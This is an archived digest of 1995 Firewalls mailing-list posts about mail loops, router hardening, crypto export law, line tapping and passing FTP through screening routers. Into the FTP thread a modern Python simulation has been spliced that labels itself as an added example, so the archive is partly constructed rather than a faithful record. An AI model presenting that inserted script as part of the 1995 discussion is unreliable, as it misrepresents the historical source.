Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01514 for firewalls-outgoing; Mon, 2 Oct 1995 12:03:11 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA01507 for ; Mon, 2 Oct 1995 12:03:08 -0700 Received: from ALABAMA.CF.CS.YALE.EDU by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA09767; Mon, 2 Oct 1995 11:54:39 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id OAA14573; Mon, 2 Oct 1995 14:45:12 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id NAA27183; Mon, 2 Oct 1995 13:27:31 -0400 (EDT) Date: Mon, 2 Oct 1995 13:27:31 -0400 (EDT) Message-Id: <199510021727.NAA27183@SPARKY.CF.CS.YALE.EDU> To: ckapilla@interserver.com, firewalls@GreatCircle.COM Subject: Re: Mail Loops Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>This isn't really relevant to firewalls, but it *is* relevant to this list
>because it seems to happen here regularly, i.e., those lovely mail storms.
>My questions are: what causes these and what can I (and everyone else) do to
>make sure that *our* systems are never responsible for one of them.

Usually they are caused by some human's error in configuring a local redistribution list (a.k.a.
exploder) -- for example putting the address firewalls@greatcircle.com on their local 'firewalls-list' mailing list alias. This would cause one copy of each message posted to the list to be looped back, ad infinitum.

I'd normally say that regular subscribers (people not in the "loop" so to speak :-) wouldn't be able to do anything about it. But, upon further thinking, you probably could rig up a mail filtering agent (such as slocal, procmail, etc.) together with a database of 'seen' RFC822 Message-Ids, in a manner similar to the way the INN USENET software screens out incoming duplicate messages based on the Message-Id header. Rather than just putting such a mechanism in front of individual mailboxes, putting it in the mailstream just before the local redistribution list expansion would short-circuit infinitely looping messages. Assuming no one is munging Message-Id headers...

- Morrow

From firewalls-owner Mon Oct 2 12:31:15 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01966 for firewalls-outgoing; Mon, 2 Oct 1995 12:12:52 -0700 Received: from xs1.xs4all.nl (xs1.xs4all.nl [193.78.33.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01959 for ; Mon, 2 Oct 1995 12:12:48 -0700 From: foxtrot@xs4all.nl Received: from KEA_55402 (asd01-12.dial.xs4all.nl) by xs1.xs4all.nl with SMTP id AA22161 (5.67b/IDA-1.5 for ); Mon, 2 Oct 1995 20:11:23 +0100 Date: Mon, 2 Oct 1995 20:11:23 +0100 Message-Id: <199510021911.AA22161@xs1.xs4all.nl> X-Sender: foxtrot@xs4all.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com Subject: Access to MS routers X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

This is my second question about Morning Star routers on this list (BTW, thanks to the people who responded the first time).... Our MS router is situated between an application gateway (AG) on our internal network and a dial-up PPP connection to our Internet provider.
First, as I'm using one (static dial-up) route to our service provider and one route to the AG I suppose I can disable dynamic routing on the MS router by deleting 'gated' and enable static routing with the line 'route add default <<>' in RC.BOOT. Am I right????

Second, I don't want any service running on my router, so I want to delete the files 'services'. That's OK??? Or should there be one entry for 'syslog' (514/udp)? Why should there be a nfsd on the router???? Is it safe to delete all protocol entries in the file 'protocol' but IP and TCP (I don't want any other protocols)???

Third, what's the use of the file smp.parties (SNMP???) and ACL.parties????? Can I delete the files 'vectors', 'tzposixrules', 'view.parties'???

Fourth, in the rc.boot file there's a line which reads 'getty tty2 9600 nowait respawn'. Does this mean that more than one person is allowed to log in simultaneously??? Should 'nowait' be replaced with 'wait'???

The reason for asking these questions is that after the bankruptcy of our firewall-supplier we haven't got any documentation at all and we are evaluating our current firewall. The setup should be as minimal as possible.

Again, my thanks in advance for any response,

Adriaan

From firewalls-owner Mon Oct 2 12:55:31 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01830 for firewalls-outgoing; Mon, 2 Oct 1995 12:07:32 -0700 Received: from daphne.Read.TASC.COM (daphne1.read.tasc.com [147.81.243.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01821 for ; Mon, 2 Oct 1995 12:07:24 -0700 Received: from smtpgate.read.tasc.com by daphne.Read.TASC.COM (5.x/TASC-NONDOM-1.7) id AA01400; Mon, 2 Oct 1995 15:06:25 -0400 Received: from TASCREAD-Message_Server by smtpgate.read.tasc.com with Novell_GroupWise; Mon, 02 Oct 1995 15:06:25 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 02 Oct 1995 15:05:32 -0400 From: "Robert E.
Bowes" To: firewalls@GreatCircle.COM Subject: RE: -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>> - 10/2/95 12:38 PM >>>
> Frank Willoughby wrote that when sending encrypted mail to a French
> destination, one must supply the French Gov. with a key. If I, based
> in London, England, were to send an encrypted (say using PGP with a
> 1024 bit key) to someone in France, and the French state found out,
> who would they prosecute? They can't touch me, and all the recipient
> has to prove is that the message was unsolicited - or am I missing
> something here?
>
> Mark Blackman.
>
While the government of France could not do much, if anything, to you, I'm sure they could make things unpleasant for the recipient.

John
>>>>>>>>>>>>>>>

I'm not sure what this has to do with firewalls, but since I didn't raise the issue, perhaps I can give some insight.

If you send a message to someone in France using PGP, then you will use that person's public key to encrypt the message. You cannot decrypt the message because you don't have that person's private key. Therefore, the only key you could provide would be the person's public key. Your friend may have to provide his/her private key to French officials, but that's a different story.

Now, if your friend sends you an encrypted message, she will use your public key (which you've provided to the world, thus the French officials) and since you are not in France, they can't get your private key.

Thus, IMO, the only thing the French officials could possibly ask for that is not publicly available is your friend's secret key since he's in France and subject to French law.

Does this make sense?
Bob From firewalls-owner Mon Oct 2 13:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA03416 for firewalls-outgoing; Mon, 2 Oct 1995 12:54:38 -0700 Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA03408 for ; Mon, 2 Oct 1995 12:54:35 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA29381; Mon, 2 Oct 95 15:55:30 EDT Date: Mon, 2 Oct 1995 15:55:29 -0400 (EDT) From: Scott Barman To: Adam Shostack Cc: Ken Hardy , firewalls@GreatCircle.COM Subject: Re: non-root low ports In-Reply-To: <199510021814.OAA01633@calloway.bwh.harvard.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Oct 1995, Adam Shostack wrote: > Ken Hardy wrote: > > | It seems to me that it would be worthwhile to patch the kernel for the > | firewall to not require root to open low ports. I cannot imagine (not > | having examined the sources, yet) that it would be too difficult to > | find and modify this behaviour in the BSD sources. > > It strikes me that a better idea (and one mentioned in C&B) is > to have a small program to open the privledged port, and then exec the > daemon. This has the benefits of not requiring kernel source > modifications to work, and being small and somewhat closer to > verifiable. > > So, does anyone have such a program written that they'd be > willing to share? tcp_wrappers... then there's TIS' FWTK... I understand Freestone is something interesting to look at... scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." 
From firewalls-owner Mon Oct 2 13:04:27 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01462 for firewalls-outgoing; Mon, 2 Oct 1995 12:02:37 -0700 Received: from carshp.carsinfo.com (carshp.carsinfo.com [192.148.241.111]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01455 for ; Mon, 2 Oct 1995 12:02:32 -0700 Received: by carshp.carsinfo.com (1.38.193.5/16.2) id AA21940; Mon, 2 Oct 1995 14:58:03 -0400 Date: Mon, 2 Oct 1995 14:58:02 -0400 (EDT) From: Richard Reno Subject: Re: How secure is a WAN then? To: Peter Gregory Cc: firewalls@GreatCircle.COM In-Reply-To: <9510021453.AA02912@radiatore.mccaw-stg.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Mon, 2 Oct 1995, Peter Gregory wrote:
> > My company (me.com) has offices in Europe and headquarters in the US. If we use
> > dedicated leased lines from the US to Europe (say from AT&T or MCI), can
> > someone in between get our data?
>
> Absolutely. A CO switch at one of the local phone companies in this part of
> the country was broken into and dedicated circuits tapped and listened to.
> Because of this recent incident, my present client's "private" T1 circuits,
> therefore, are link-encrypted.
>
> Pete
>

In fact there does not have to even be a breakin if there is collusion on the part of someone at the CO. Long ago in the days of Strowger switches there was an additional path through the CO which could connect the test bench with any subscriber line. The troubleshooting personnel could dial up the desired line without any ring signal and proceed to make electrical measurements on the target line. They could also listen for noise and sound quality.

Many years ago I was involved in an electronic meter reading project in a much newer digital controlled CO. We needed to be able to attach to a subscriber line and interrogate the reader without waking the customer at night.
We called one of the design engineers of the CO switch and he gave us a code which when entered on the console made the line our poller was attached to a "test" line. Now we could dial any number in the CO and there was absolutely no indication on the called line. We had in effect a dialable phone tap!

T1 lines enter in a somewhat different manner but still some engineer probably put this feature in for diagnostic purposes. The point is that even if there is strong security associated with such capabilities it can be subverted. In France this probably just involves a call from the security agency. Do you think it is all that different in some areas here?

Richard

From firewalls-owner Mon Oct 2 13:32:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04500 for firewalls-outgoing; Mon, 2 Oct 1995 13:21:52 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA04491 for ; Mon, 2 Oct 1995 13:21:48 -0700 Date: Mon, 2 Oct 1995 16:20:18 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951002162018.210456b5@hobbes.orl.mmc.com> Subject: LAWZ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

MArk rites:
> 1024 bit key) to someone in France, and the French state found out,
> who would they prosecute? They can't touch me, and all the recipient
> has to prove is that the message was unsolicited - or am I missing
> something here?

Though I lack legal credentials (found a different way to say it), would suspect that you may be correct about (a) (just do not ever set foot in France since could be charged and found guilty in absentia). I have this dim recollection about differences in "presumption of guilt" between English common law (on which much of the Amerricun system is built) and the Napoleonic code.
If the recipient *had* a 1k private key (so you could encrypt with their public key), that may be required to be registered even to possess. Of course if you just used your private key to encrypt then anyone with your public key could decrypt & might be considered in "the public domain" particularly if on a public keyserver.

Of course I may well be a couple of centuries out of date...

Warmly,
Padgett

From firewalls-owner Mon Oct 2 14:23:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07106 for firewalls-outgoing; Mon, 2 Oct 1995 14:19:01 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07093 for ; Mon, 2 Oct 1995 14:18:55 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA10607; Mon, 2 Oct 95 16:15:18 -0400 Date: Mon, 2 Oct 95 16:15:18 -0400 Message-Id: <9510022015.AA10607@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "A. Padgett Peterson, P.E. Information Security" From: frankw@in.net (Frank Willoughby) Subject: Re: Encryption strength (Was How secure is a WAN...) Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From Padgett's mail:
>Frank rites:
>
>>Also, unless you are bank or an arm of a foreign gov't I believe the largest
>>exportable key size is 40 & can be broken by a brute force attack (as Netscape
>>so amply demonstrated with their brilliant IDEA).
>

Sorry. I should have been more explicit in my comments. I was referring to the encryption product's (h/w & s/w) capabilities - in particular, the key size. Anything over 40 bits has a significantly reduced chance of getting approval for being shipped overseas unless the recipient is an agency of a (friendly) foreign government or a bank.

>May have been exactly what Marc intended...
>
>Really though, ITAR (International Trade in Arms Regulation) is not well
>understood (AFAIR you can find a copy on eff.org) which leads to many
>mythconceptions as above (actually is a fascinating document to read - almost
>as good as Brent's book which just arrived - he even had the effrontery
>to claim I paid too much 8*).
>
>There is -=>NO<=- ITAR limit on the size of a key which may be sent abroad,
>many of us regularly send our 1024 bit PGP keys internationally. (And BTW,
>technology exists which can break 40 bit IDEA in an average of an hour and
>a half).

This is correct as I mentioned above.

>
>What ITAR limits is the export of cryptographic *equipment* (software
>is equipment and if you think that is strange, in some cases ITAR
>considers patented ciphers to be in the public domain) capable of
>generating larger keys (there is some question about export of receive-
>only software). Further, the list of exceptions to ITAR is quite long -
>antivirus software is one, ATM (bank) machine transactions is another,
>cable TV is YA. However if it can generate a key, it is essentially
>verboden. (Violations are considered on a case by case basis so wearing
>your Li'l Orphan Annie Secret Decoder Ring to Guadalajara is probably
>OK but might have to get a license. Consult a shyster 8*)
>

This is also correct as I mentioned above. BTW, verboden is actually spelled "Verboten".

>And while the nits are RIPEM, Netscape used Ron's Code number 4, not IDEA,
>after an initial RSA exchange. Phil is the one who uses RSA/IDEA.

I'm not too sure about this. I went back to check my mails & the author of the posting I received about the August 16th cracking of the Netscape algorithm by the French hacker thought it was IDEA.
> > Warmly, > Padgett > Best Regards, Frank From firewalls-owner Mon Oct 2 14:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07309 for firewalls-outgoing; Mon, 2 Oct 1995 14:24:03 -0700 Received: from village.zone.com (village.zone.com [204.247.108.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA07302 for ; Mon, 2 Oct 1995 14:23:57 -0700 Received: (from tonny@localhost) by village.zone.com (8.6.11/8.6.9) id OAA13099 for Firewalls@GreatCircle.Com; Mon, 2 Oct 1995 14:17:32 -0700 Date: Mon, 2 Oct 1995 14:17:32 -0700 From: Tonny Yu Message-Id: <199510022117.OAA13099@village.zone.com> To: Firewalls@GreatCircle.Com Subject: Computer ESP Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Morning Star Technologies: U.Vision Inc introduced a new Internet service, Computer ESP, two weeks ago. Computer ESP was selected as a Yahoo weekly pick within the first week of opening. Response has been overwhelming. URL: http://www.uvision.com Computer ESP is a revolutionary new Internet guide. Anyone on the Internet can now quickly and easily find comprehensive, organized, up-to-date information on over 20,000 computer manufacturers and dealers and their products. Customers can pre-set some purchasing criteria, such as price, and when it's reached, they are automatically e-mailed. Customers can also ask for price quotes. Customers can send e-mail and faxes directly from Computer ESP to most listed companies. Customers may already have contacted your company through Computer ESP. Everything is free and easy for the customers. We may have already extracted public information from your Web pages on your company and perhaps your products. This public information may include contact information, graphical location maps, job openings, product specifications, and much more. Our FREE listings may include over 400 fields. 
We would appreciate it if you could take a look and let us know if we need to
make any corrections to the information for your company and products. Please
fill out a new account form if your company is not yet listed. Also, please let
us know if you are interested in fulfilling any of our growing list of quote
requests.

We would love to hear what you think of Computer ESP. We have several more cool
features in the works. Also, please let us know if you do not want Computer ESP
customers to send email to this address.

Thank you.

==========================================================================
Tonny Yu
U.Vision.Inc President
The Visibility Provider(sm)
tonny@uvision.com
http://www.uvision.com
FAX:(415)369-1005

From firewalls-owner Mon Oct 2 15:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06779 for firewalls-outgoing; Mon, 2 Oct 1995 14:13:16 -0700
Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA06752 for ; Mon, 2 Oct 1995 14:13:04 -0700
Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id RAA02810 for ; Mon, 2 Oct 1995 17:13:40 -0400
Date: Mon, 2 Oct 1995 17:13:40 -0400
Message-Id: <199510022113.RAA02810@hatteras.ch.inri.com>
X-Sender: wlb@hatteras.ch.inri.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: wbunting@ch.inri.com (Bill Bunting)
Subject: FW to FW FTP w/ no port > 1023
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone know a nice way to allow FTP file transfers between Firewalled
sites that both do not allow TCP ports > 1023? (i.e.
the screening router allows established TCP, FTP control connections (port 21),
and does not allow any ports >1023)

Internal users are allowed to use FTP to login to non firewall protected sites
using passive FTP. However, in order to have an FTP session, one of the two
sides must allow arbitrary port connections. If two firewall protected sites
want to talk FTP, one of the two sides must allow arbitrary ports. With our
firewall, this is not allowed.

Here is what it looks like (To simplify, TIS fwtk proxy not shown):

Client tries passive mode...

C-|----------21-control-connection---|-> S
C-|---21---PASV Command--------------|-> S
C-|------arbitrary-port-for-data---->| S   (blocked by server side firewall)

Client tries PORT command....

C-|----------21-control-connection---|-> S
C-|---21-PORT--Command---------------|-> S
C |<------arbitrary-port-for-data----|- S  (blocked by Client side firewall)

Things I have considered.
-------------------------
1. Poke a hole in the firewall and allow FTP data connections on port 20
   (ftp-data). FTP client would be reprogrammed to use port 20 for data
   connections. Issues: Multiple concurrent FTP client listen requests could
   get swapped. (What happens in the FTP implementation when this occurs?)

2. Poke a range of holes in the firewall. Reprogram the FTP client to look
   for free ports within the range. Issues: Still required to poke several
   holes in the firewall, requires custom FTP software. Benefit: listen
   requests will not be swapped. (Best solution that I can find so far)

3. Do not use FTP and write a TCP application that uses only a single TCP
   port for data and control. Issues: Time + $$ no compatibility. Benefit:
   solves the problem.

4. Am I missing something??? Help. How are other people doing this?? Do
   most people just allow ports > 1023??
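The two blocked exchanges drawn above, and options 1 and 2 from the list, can be replayed against a small model of the screening rules. This Python simulation is an added example, not part of Bill's post or of any FTP implementation; the port range it opens for option 2 (40000-40003) is made up for illustration.

```python
"""Model of the FTP data-connection problem described in the post above.

Both sites run a screening router that passes outbound and established
TCP but admits a new inbound connection only to port 21 (the FTP control
port).  Everything here is a simulation, not real sockets.
"""
from dataclasses import dataclass, field
from typing import Iterable, Optional, Tuple

FTP_CONTROL = 21
FTP_DATA = 20
EPHEMERAL = range(1024, 65536)  # ports a stock FTP client/server picks for data


@dataclass
class ScreeningRouter:
    """Inbound policy of one site: a new connection is accepted only if its
    destination port is in `inbound_ports`.  The default is the policy in
    the post: only the control connection (port 21) gets in."""
    name: str
    inbound_ports: frozenset = frozenset({FTP_CONTROL})

    def allows_inbound(self, dst_port: int) -> bool:
        return dst_port in self.inbound_ports


@dataclass
class Host:
    """An FTP endpoint behind its site's screening router."""
    name: str
    router: ScreeningRouter
    listening: set = field(default_factory=set)  # data ports already in use

    def listen(self, candidates: Iterable[int]) -> Optional[int]:
        """Bind the first free port among `candidates`, or None if all are busy.
        A concurrent transfer that finds no free port fails here; that is how
        this model represents the collision option 1 in the post worries about."""
        for port in candidates:
            if port not in self.listening:
                self.listening.add(port)
                return port
        return None


def data_connection(client: Host, server: Host, mode: str,
                    client_ports: Iterable[int] = EPHEMERAL,
                    server_ports: Iterable[int] = EPHEMERAL) -> Tuple[bool, str]:
    """Try to open one FTP data connection and report which router, if any,
    drops it.  The control connection client -> server:21 is assumed up,
    since both routers admit inbound port 21."""
    if mode == "PASV":
        # Server listens on an arbitrary port and the client connects to it,
        # so the SYN arrives inbound at the *server* site.
        port = server.listen(server_ports)
        if port is None:
            return False, f"{server.name}: no free data port"
        if not server.router.allows_inbound(port):
            return False, f"{client.name} -> {server.name}:{port} dropped by {server.router.name}"
        return True, f"{client.name} -> {server.name}:{port} established"
    if mode == "PORT":
        # Client listens and announces the port; the server connects from
        # port 20, so the SYN arrives inbound at the *client* site.
        port = client.listen(client_ports)
        if port is None:
            return False, f"{client.name}: no free data port"
        if not client.router.allows_inbound(port):
            return False, f"{server.name}:{FTP_DATA} -> {client.name}:{port} dropped by {client.router.name}"
        return True, f"{server.name}:{FTP_DATA} -> {client.name}:{port} established"
    raise ValueError(f"unknown mode {mode!r}")


def scenarios() -> dict:
    """Replay the post's two failing exchanges and its options 1 and 2."""
    out = {}
    server = Host("S", ScreeningRouter("server-side firewall"))

    # As drawn in the post: both sites admit only port 21 inbound.
    client = Host("C", ScreeningRouter("client-side firewall"))
    out["pasv_both_blocked"] = data_connection(client, server, "PASV")
    out["port_both_blocked"] = data_connection(client, server, "PORT")

    # Option 1: open port 20 inbound at the client site and make the client
    # listen there.  The first transfer works; a concurrent one has nowhere
    # to listen.
    c1 = Host("C", ScreeningRouter("client-side firewall",
                                   frozenset({FTP_CONTROL, FTP_DATA})))
    out["option1_first"] = data_connection(c1, server, "PORT", client_ports=[FTP_DATA])
    out["option1_concurrent"] = data_connection(c1, server, "PORT", client_ports=[FTP_DATA])

    # Option 2: open a small range (constructed here as 40000-40003) and have
    # the client pick a free port inside it.  Four transfers fit; a fifth
    # does not, which is the cost of keeping the hole small.
    data_range = range(40000, 40004)
    c2 = Host("C", ScreeningRouter("client-side firewall",
                                   frozenset({FTP_CONTROL}) | frozenset(data_range)))
    out["option2_four_concurrent"] = [
        data_connection(c2, server, "PORT", client_ports=data_range)[0] for _ in data_range]
    out["option2_fifth"] = data_connection(c2, server, "PORT", client_ports=data_range)
    return out


if __name__ == "__main__":
    for name, result in scenarios().items():
        print(f"{name:24s} {result}")
```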
Thank you,

---------------------------------------
Bill Bunting, Software Engineer
Inter-National Research Institute, Inc.
1441 Crossways Boulevard, Suite 102
Chesapeake, Virginia 23320
V(804)424-8675 F(804)420-4262
wbunting@inri.com
bunting@cs.odu.edu
http://www.cs.odu.edu/~bunting
---------------------------------------

From firewalls-owner Mon Oct 2 16:22:32 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12030 for firewalls-outgoing; Mon, 2 Oct 1995 16:05:40 -0700
Received: from zacatecas.optimum.com (zacatecas.optimum.com [198.81.218.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA12022 for ; Mon, 2 Oct 1995 16:05:36 -0700
Received: from optimum.com by zacatecas.optimum.com (5.67a/95032401) id AA01026; Mon, 2 Oct 1995 19:04:02 -0400
X-Sender: srp336@mail.optimum.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 2 Oct 1995 19:04:05 -0400
To: firewalls@greatcircle.com
From: srp336@optimum.com (Steven R. Pfister)
Subject: udprelay on SunOS 4.1.3
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am about to install udprelay on a Sun Sparc 5 running SunOS 4.1.3. I seem to
remember hearing about a patch to udprelay that was needed to do this. Is there
such a patch and where do I get it from?

Thanks!
Steve Pfister // Network Administrator
optimum.net
srp685@optimum.net

From firewalls-owner Mon Oct 2 16:30:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12711 for firewalls-outgoing; Mon, 2 Oct 1995 16:17:12 -0700
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA12686; Mon, 2 Oct 1995 16:17:06 -0700
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 2 Oct 1995 16:16:47 -0800
To: Tonny Yu , Firewalls@GreatCircle.Com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Computer ESP
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 2:17 PM 10/2/95, Tonny Yu wrote:
>Morning Star Technologies:
>
>U.Vision Inc introduced a new Internet service, Computer ESP, two weeks
>ago. Computer ESP was selected as a Yahoo weekly pick within the first
>week of opening. Response has been overwhelming.
>
>URL: http://www.uvision.com
>
>Computer ESP is a revolutionary new Internet guide. Anyone on the Internet can
>now quickly and easily find comprehensive, organized, up-to-date information on
>over 20,000 computer manufacturers and dealers and their products.
>Customers can
>pre-set some purchasing criteria, such as price, and when it's reached, they
>are automatically e-mailed. Customers can also ask for price quotes.

Your ESP is broken, if you think that "Firewalls@GreatCircle.COM" is the
email address for Morning Star Technologies.

Congratulations, you've just spammed and annoyed 15,000 or so people on the
Firewalls mailing list. I'm sure they'll appreciate your efforts; you've
certainly made a memorable first impression...

Please remove all references to Firewalls@GreatCircle.COM from your system.
-Brent

--
Brent Chapman          | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM  | 1057 West Dana Street   | Tutorial-Info@GreatCircle.COM
+1 415 962 0841        | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Mon Oct 2 16:53:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA16864 for firewalls-outgoing; Mon, 2 Oct 1995 16:42:44 -0700
Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA16845 for ; Mon, 2 Oct 1995 16:42:36 -0700
Received: from yeager.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) id QAA01207; Mon, 2 Oct 1995 16:39:51 -0700
Received: by yeager.corp.sgi.com (950911.SGI.8.6.12.PATCH825/930416.SGI) id QAA00800; Mon, 2 Oct 1995 16:39:10 -0700
From: lear@yeager.corp.sgi.com (Eliot Lear)
Message-Id: <9510021639.ZM798@yeager.corp.sgi.com>
Date: Mon, 2 Oct 1995 16:39:09 -0700
In-Reply-To: toon@cem-bb.e-mail.com "RFC 1597" (Oct 2, 8:33am)
References: <199510021231.FAA17889@miles.greatcircle.com>
Reply-to: lear@palladium.corp.sgi.com
X-Mailer: Z-Mail (3.2.1 6apr95 MediaMail)
To: toon@cem-bb.e-mail.com, firewalls@greatcircle.com
Subject: Re: RFC 1597
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

1627 stands on its own; but basically we had three problems with 1597:

Procedural - 1597 received 0 review from the ietf.
Operational - blindly following 1597 can lead to serious consequences.
Architectural - it was a break from the all unique world we lived in.

The new draft can be found where you find other Internet Drafts; its title is
draft-ietf-cidrd-private-addr-03.txt. It attempts to address the first two of
these issues. The third is basically lost.
--
Eliot Lear
[lear@sgi.com]

From firewalls-owner Mon Oct 2 17:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA16016 for firewalls-outgoing; Mon, 2 Oct 1995 16:37:09 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15847 for ; Mon, 2 Oct 1995 16:36:59 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA28339; Tue, 3 Oct 1995 09:30:37 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma028335; Tue Oct 3 09:30:23 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA14998; Tue, 3 Oct 1995 09:36:16 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9510022336.AA14998@citecub.citec.qld.gov.au>
Subject: Re: FW to FW FTP w/ no port > 1023
To: wbunting@ch.inri.com (Bill Bunting)
Date: Tue, 3 Oct 95 9:36:16 EST
Cc: firewalls@greatcircle.com
In-Reply-To: <199510022113.RAA02810@hatteras.ch.inri.com>; from "Bill Bunting" at Oct 2, 95 5:13 pm
X-Mailer: ELM [version 2.3 PL11]
content-length: 2074
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I believe the only(?) option is to allow incoming connections. The ftp gateway
(for example) sends out a PORT command listing a port > 1023, so the ftp
server creates a connection from port 20 to a port > 1023. If you can live
with incoming connections to ports > 1023 you can have ftp access. Of course
this means tightening up the security on the box(es) receiving those incoming
connections. On a bastion host the only things listening on ports > 1023 will
be the ftp gateway (on the ones I build).

Colin

> [chomp]
>
> Things I have considered.
> -------------------------
> 1. Poke a hole in the firewall and allow FTP data connections on port 20
> (ftp-data). FTP client would be reprogrammed to use port 20 for data
> connections.
> Issues: Multiple concurrent FTP client listen requests could
> get swapped. (What happens in the FTP implementation when this occurs?)
>
> 2. Poke a range of holes in the firewall. Reprogram the FTP client to look
> for free ports within the range. Issues: Still required to poke several
> holes in the firewall, requires custom FTP software. Benefit: listen
> requests will not be swapped. (Best solution that I can find so far)
>
> 3. Do not use FTP and write a TCP application that uses only a single TCP
> port for data and control. Issues: Time + $$ no compatibility. Benefit:
> solves the problem.
>
> 4. Am I missing something??? Help. How are other people doing this?? Do
> most people just allow ports > 1023??
>
> Thank you,
> ---------------------------------------
> Bill Bunting, Software Engineer
> Inter-National Research Institute, Inc.
> 1441 Crossways Boulevard, Suite 102
> Chesapeake, Virginia 23320
> V(804)424-8675 F(804)420-4262
> wbunting@inri.com
> bunting@cs.odu.edu
> http://www.cs.odu.edu/~bunting
> ---------------------------------------
>

From firewalls-owner Mon Oct 2 17:24:07 1995
